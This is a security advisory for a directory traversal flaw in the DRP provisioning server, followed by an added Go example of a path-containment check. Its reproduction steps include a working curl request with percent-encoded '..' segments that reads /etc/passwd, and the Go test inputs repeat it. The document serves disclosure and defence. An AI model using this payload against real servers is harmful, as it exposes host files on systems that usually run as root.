Security (Web requests can navigate outside DRP controlled areas (CVE-20200924a))
The DRP server incorrectly honors ".." path segments in web requests even when the resulting path is outside the managed areas. This potentially allowed bad actors to access the host file system.
- Classification: Directory Traversal
- Reported: Sept 24, 2020
- Fixed: Sept 24, 2020
- Addressed In: v4.5, v4.4.7, v4.3.8, v4.2.17
Users are advised to apply this patch as soon as possible. Patching involves replacing the DR-SERVER binary with the patched release that most closely matches the currently deployed version.
Code was added to prevent out-of-bounds navigation.
Steps to reproduce

    docker run --rm -it ubuntu /bin/bash
    apt update && apt install -y curl
    cd /opt
    mkdir drp ; cd drp
    curl -fsSL get.rebar.digital/stable | bash -s -- --isolated install
    ./dr-provision --base-root=`pwd`/drp-data --local-content="" --default-content="" > drp.log 2>&1 &
    curl -k https://127.0.0.1:8092/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd
The above results in the contents of /etc/passwd being shown. This is particularly bad given that this application generally runs as root.
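A containment check of the kind that rejects the request above, as an added Go example. It is not the DRP patch or DRP code; the function name ResolveUnderRoot, the error value and the sample root directory are assumptions made for illustration.

```go
package main

import (
	"errors"
	"fmt"
	"net/url"
	"path/filepath"
	"strings"
)

// ErrOutsideRoot reports a request path that resolves outside the managed root.
var ErrOutsideRoot = errors.New("path escapes managed root")

// ResolveUnderRoot (hypothetical helper) maps a raw, still percent-encoded URL
// path onto a file below root and rejects anything that resolves outside it.
func ResolveUnderRoot(root, rawPath string) (string, error) {
	decoded, err := url.PathUnescape(rawPath) // "%2e%2e" becomes ".."
	if err != nil {
		return "", err
	}
	absRoot, err := filepath.Abs(root)
	if err != nil {
		return "", err
	}
	// Join cleans the result, so every ".." segment is resolved here,
	// after decoding and before the containment test.
	candidate := filepath.Join(absRoot, filepath.FromSlash(decoded))
	rel, err := filepath.Rel(absRoot, candidate)
	sep := string(filepath.Separator)
	if err != nil || rel == ".." || strings.HasPrefix(rel, ".."+sep) {
		return "", ErrOutsideRoot
	}
	return candidate, nil
}

func main() {
	root := "/opt/drp/drp-data" // constructed sample root
	for _, p := range []string{ // constructed sample request paths
		"/files/bootx64.efi",
		"/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd",
		"/files/../../../etc/passwd",
		"/files/../isos/readme.txt",
	} {
		got, err := ResolveUnderRoot(root, p)
		fmt.Printf("%-55s -> %q err=%v\n", p, got, err)
	}
}
```

The check is lexical only: a symlink inside the managed root that points elsewhere still needs filepath.EvalSymlinks on the result before the containment test is trusted.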